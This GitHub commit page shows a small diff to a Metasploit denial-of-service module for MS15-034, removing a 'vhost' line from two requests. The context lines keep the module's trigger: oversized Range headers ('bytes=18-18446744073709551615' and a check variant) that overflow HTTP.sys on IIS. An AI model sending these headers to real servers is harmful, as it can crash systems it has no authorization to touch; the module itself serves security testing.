Skip to content

Commit 90ed6ee

Browse files
committed
No "vhost"
1 parent 3aa8e69 commit 90ed6ee

File tree

1 file changed

+0
-2
lines changed

1 file changed

+0
-2
lines changed

modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb

Lines changed: 0 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -67,7 +67,6 @@ def dos_host(ip)
6767
req = cli.request_raw({
6868
'uri' => uri,
6969
'method' => 'GET',
70-
'vhost' => 'stuff',
7170
'headers' => {
7271
'Range' => 'bytes=18-18446744073709551615'
7372
}
@@ -102,7 +101,6 @@ def check_host(ip)
102101
res = send_request_raw({
103102
'uri' => uri,
104103
'method' => 'GET',
105-
'vhost' => 'stuff',
106104
'headers' => {
107105
'Range' => 'bytes=0-18446744073709551615'
108106
}

0 commit comments

Comments
 (0)